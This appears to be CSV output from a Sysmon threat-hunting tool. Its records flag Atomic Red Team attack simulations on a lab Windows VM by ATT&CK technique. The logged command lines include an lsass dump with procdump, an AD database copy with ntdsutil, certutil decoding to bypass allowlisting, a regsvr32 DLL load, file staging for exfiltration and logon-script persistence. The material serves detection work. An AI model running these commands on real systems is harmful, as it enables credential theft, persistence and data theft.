C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4065 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.938 + 747F3D96-DA3F-5D31-0000-0010813E3C00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + 
"C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -decode file.txt c:\file.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ) tried decoding file or information,1," + + + + + 1 + 5 + 4 + 
1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -decode file.txt c:\file.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4064 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.818 + 747F3D96-DA3F-5D31-0000-001022323C00 + 6888 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -decode file.txt c:\file.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c 
"certutil.exe -decode file.txt c:\file.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4063 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.786 + 747F3D96-DA3F-5D31-0000-0010562E3C00 + 4020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "certutil.exe -decode file.txt c:\file.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe -encode c:\file.exe file.txt)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4062 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.261 + 747F3D96-DA3F-5D31-0000-00109E193C00 + 1260 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -encode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 
747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe -encode c:\file.exe file.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4062 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.261 + 747F3D96-DA3F-5D31-0000-00109E193C00 + 1260 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil.exe -encode c:\file.exe file.txt + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548223.309488,2019-07-19T18:57:03.309488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 
0x8000000000000000 + + + 4061 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:03.223 + 747F3D96-DA3F-5D31-0000-00104C173C00 + 4832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4054 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:16.818 + 747F3D96-D998-5D31-0000-00101BB73900 + 2424 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] 
Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4053 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:16.766 + 747F3D96-D998-5D31-0000-001008B43900 + 2000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4052 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:54:01.940 + 747F3D96-D989-5D31-0000-0010FC7B3900 + 4944 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4049 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:54.968 + 747F3D96-D982-5D31-0000-0010DC633900 + 4240 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4048 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 
+ + + + + + 2019-07-19 14:53:47.230 + 747F3D96-D97B-5D31-0000-0010F0F03800 + 6888 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] 
Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4047 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:53:47.056 + 747F3D96-D97B-5D31-0000-00109DEB3800 + 5788 + C:\Windows\SysWOW64\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 
747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8 + 747F3D96-D97A-5D31-0000-001019DE3800 + 5828 + C:\Windows\System32\regsvr32.exe + "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4128 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.958 + 747F3D96-DD9E-5D31-0000-00100C3F4B00 + 5036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4127 + + + + + 
Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.875 + 747F3D96-DD9E-5D31-0000-00106D3A4B00 + 4208 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.845 + 747F3D96-DD9E-5D31-0000-001059374B00 + 584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4125 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.673 + 747F3D96-DD9E-5D31-0000-00109A2F4B00 + 264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contain suspicious command ( procdump.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4124 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:26.626 + 747F3D96-DD9E-5D31-0000-00106E2C4B00 + 5488 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 
